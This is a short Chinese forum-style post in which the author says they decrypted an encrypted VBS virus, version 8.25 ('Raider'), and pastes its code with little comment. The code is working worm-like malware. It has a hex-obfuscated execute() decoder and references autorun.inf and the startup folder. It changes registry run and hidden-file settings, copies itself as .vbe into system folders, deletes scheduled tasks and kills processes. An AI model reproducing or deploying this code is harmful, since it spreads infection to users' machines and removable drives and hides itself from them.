死了一堆脑细胞解了某加密VBS毒出来,'8.25版本的;
不是有漏否?懒得理会了……
function uc(b)
x="633D766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D3D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0A693D22696620613D223A743D22207468656E20223A653D22656C7365696620613E3D223A613D2220616E6420613C3D223A673D22613D612B223A6F3D74266326673A703D6326653A713D6326690D0A65786563757465286C2622666F722069693D3120746F206C656E2862293A613D617363286D696428622C69692C3129292226712622642226742622613D31332226712622662226742622613D313022267126226A22267426632622613D3334222663266526226822266126226D22266F26227222267026226B22266126226E22266F262273222670262235332226612622353722266F262275222670262234382226612622353222266F2622762226632622656E64206966222663262275633D75632B63687228612922266326226E657874222663262275633D726E2B632B75632229":y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y)
end function
function gt()
execute(uc(gtz))
end function
function ei(name,wt)
execute(uc(eiz))
end function
function df(wh)
execute(uc(dfz))
end function
function bf(wh,wt,da)
execute(uc(bfz))
end function
function bi(wh)
execute(uc(biz))
end function
function rt(wh,li)
execute(uc(rtz))
end function
function wr(rna,rda)
execute(uc(wrz))
end function
function rr(rna,pa)
execute(uc(rrz))
end function
function ar(file,cg)
execute(uc(arz))
end function
function dn(loc,web,ris,min)
execute(uc(dnz))
end function
function pr(pcs,gs)
execute(uc(prz))
end function
function ec(wt)
execute(uc(ecz))
end function
function co(wh)
execute(uc(coz))
end function
function rs(sw)
execute(uc(rsz))
end function
function hi(sw)
execute(uc(hiz))
end function
function gi(ids,fid,eid,fname,furl)
execute(uc(giz))
end function
function dw(pcs,fn,furl,kill)
execute(uc(dwz))
end function
function us(sw)
execute(uc(usz))
end function
function cu()
execute(uc(cuz))
end function
function km(sw)
execute(uc(kmz))
end function
function cf(wh)
execute(uc(cfz))
end function
dim d:j="\":on error resume next
ver="8.25":vs=".vbs":ve=".vbe":j="\":cm="%comspec% /c ":dfo="/8#0/":til="Raider "&ver:inf="\autorun.inf"
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna=rr(cnp,0):if cna="" then cna=til
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc=":143gzxHsH":he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
hip="HKCU"&rop&"advanced\showsuperhidden":hb="v91:;676x"&chr(124)&"r;"
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif os<>2052 then hd="p"+hc:else hd="$"+hc:end if
dim d:j="\":on error resume next
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("holle,raider!"):km 1
if sys then
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",1
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if
